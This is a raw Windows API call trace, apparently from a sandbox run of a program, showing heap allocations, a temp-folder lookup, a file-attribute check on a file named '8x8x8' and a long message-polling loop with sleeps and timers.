[0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0239.308] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0239.309] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eadf0 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0239.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0239.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eadf0 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0239.310] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0239.310] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0239.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0239.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0239.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0239.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0239.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0239.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0239.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0239.311] timeGetTime () returned 0x117bc29 [0239.311] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.311] Sleep (dwMilliseconds=0xa) [0239.347] timeGetTime () returned 0x117bc57 [0239.347] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.347] Sleep (dwMilliseconds=0xa) [0239.394] timeGetTime () returned 0x117bc86 [0239.394] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.394] Sleep (dwMilliseconds=0xa) [0239.440] timeGetTime () returned 0x117bcb5 [0239.440] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.440] Sleep (dwMilliseconds=0xa) [0239.479] timeGetTime () returned 0x117bcd4 [0239.479] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.479] Sleep (dwMilliseconds=0xa) [0239.503] timeGetTime () returned 0x117bcf4 [0239.503] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.503] Sleep (dwMilliseconds=0xa) [0239.530] timeGetTime () returned 0x117bd03 [0239.530] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.530] Sleep (dwMilliseconds=0xa) [0239.561] timeGetTime () returned 0x117bd23 [0239.561] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.561] Sleep (dwMilliseconds=0xa) [0239.582] timeGetTime () returned 0x117bd42 [0239.582] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.582] Sleep (dwMilliseconds=0xa) [0239.597] timeGetTime () returned 0x117bd51 [0239.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.597] Sleep (dwMilliseconds=0xa) [0239.612] timeGetTime () returned 0x117bd61 [0239.613] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.613] Sleep (dwMilliseconds=0xa) [0239.628] timeGetTime () returned 0x117bd71 [0239.628] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.628] Sleep (dwMilliseconds=0xa) [0239.643] timeGetTime () returned 0x117bd80 [0239.643] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0239.644] TranslateMessage (lpMsg=0x8cf798) returned 0 [0239.644] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0239.644] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0239.644] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0239.644] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.644] Sleep (dwMilliseconds=0xa) [0239.659] timeGetTime () returned 0x117bd90 [0239.659] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.659] Sleep (dwMilliseconds=0xa) [0239.675] timeGetTime () returned 0x117bda0 [0239.675] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.675] Sleep (dwMilliseconds=0xa) [0239.690] timeGetTime () returned 0x117bdaf [0239.690] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.690] Sleep (dwMilliseconds=0xa) [0239.706] timeGetTime () returned 0x117bdbf [0239.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.706] Sleep (dwMilliseconds=0xa) [0239.722] timeGetTime () returned 0x117bdce [0239.722] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.722] Sleep (dwMilliseconds=0xa) [0239.737] timeGetTime () returned 0x117bdde [0239.737] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.737] Sleep (dwMilliseconds=0xa) [0239.754] timeGetTime () returned 0x117bdee [0239.754] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.754] Sleep (dwMilliseconds=0xa) [0239.769] timeGetTime () returned 0x117bdfd [0239.769] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.769] Sleep (dwMilliseconds=0xa) [0239.816] timeGetTime () returned 0x117be2c [0239.816] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.816] Sleep (dwMilliseconds=0xa) [0239.831] timeGetTime () returned 0x117be3c [0239.831] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.831] Sleep (dwMilliseconds=0xa) [0239.847] timeGetTime () returned 0x117be4b [0239.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.847] Sleep (dwMilliseconds=0xa) [0239.863] timeGetTime () returned 0x117be5b [0239.863] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.863] Sleep (dwMilliseconds=0xa) [0239.881] timeGetTime () returned 0x117be6b [0239.881] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.881] Sleep (dwMilliseconds=0xa) [0239.894] timeGetTime () returned 0x117be7a [0239.894] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.894] Sleep (dwMilliseconds=0xa) [0239.909] timeGetTime () returned 0x117be8a [0239.909] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.909] Sleep (dwMilliseconds=0xa) [0239.925] timeGetTime () returned 0x117be9a [0239.925] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.925] Sleep (dwMilliseconds=0xa) [0239.940] timeGetTime () returned 0x117bea9 [0239.940] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.940] Sleep (dwMilliseconds=0xa) [0239.956] timeGetTime () returned 0x117beb9 [0239.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.956] Sleep (dwMilliseconds=0xa) [0239.971] timeGetTime () returned 0x117bec8 [0239.971] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.971] Sleep (dwMilliseconds=0xa) [0239.987] timeGetTime () returned 0x117bed8 [0239.987] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.987] Sleep (dwMilliseconds=0xa) [0240.003] timeGetTime () returned 0x117bee8 [0240.003] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.003] Sleep (dwMilliseconds=0xa) [0240.019] timeGetTime () returned 0x117bef8 [0240.019] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.019] Sleep (dwMilliseconds=0xa) [0240.034] timeGetTime () returned 0x117bf07 [0240.034] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.034] Sleep (dwMilliseconds=0xa) [0240.050] timeGetTime () returned 0x117bf16 [0240.050] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.050] Sleep (dwMilliseconds=0xa) [0240.066] timeGetTime () returned 0x117bf26 [0240.066] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.066] Sleep (dwMilliseconds=0xa) [0240.081] timeGetTime () returned 0x117bf36 [0240.081] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.081] Sleep (dwMilliseconds=0xa) [0240.096] timeGetTime () returned 0x117bf45 [0240.096] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.096] Sleep (dwMilliseconds=0xa) [0240.113] timeGetTime () returned 0x117bf55 [0240.113] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.113] Sleep (dwMilliseconds=0xa) [0240.206] timeGetTime () returned 0x117bfb3 [0240.206] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.206] Sleep (dwMilliseconds=0xa) [0240.221] timeGetTime () returned 0x117bfc2 [0240.221] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.221] Sleep (dwMilliseconds=0xa) [0240.237] timeGetTime () returned 0x117bfd2 [0240.237] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.237] Sleep (dwMilliseconds=0xa) [0240.253] timeGetTime () returned 0x117bfe2 [0240.253] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.253] Sleep (dwMilliseconds=0xa) [0240.268] timeGetTime () returned 0x117bff1 [0240.268] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.268] Sleep (dwMilliseconds=0xa) [0240.285] timeGetTime () returned 0x117c001 [0240.285] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.285] Sleep (dwMilliseconds=0xa) [0240.299] timeGetTime () returned 0x117c010 [0240.299] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.299] Sleep (dwMilliseconds=0xa) [0240.316] timeGetTime () returned 0x117c020 [0240.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0240.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.316] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0240.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0240.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0240.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0240.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0240.317] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0240.317] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb058 [0240.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a731b0 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0240.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 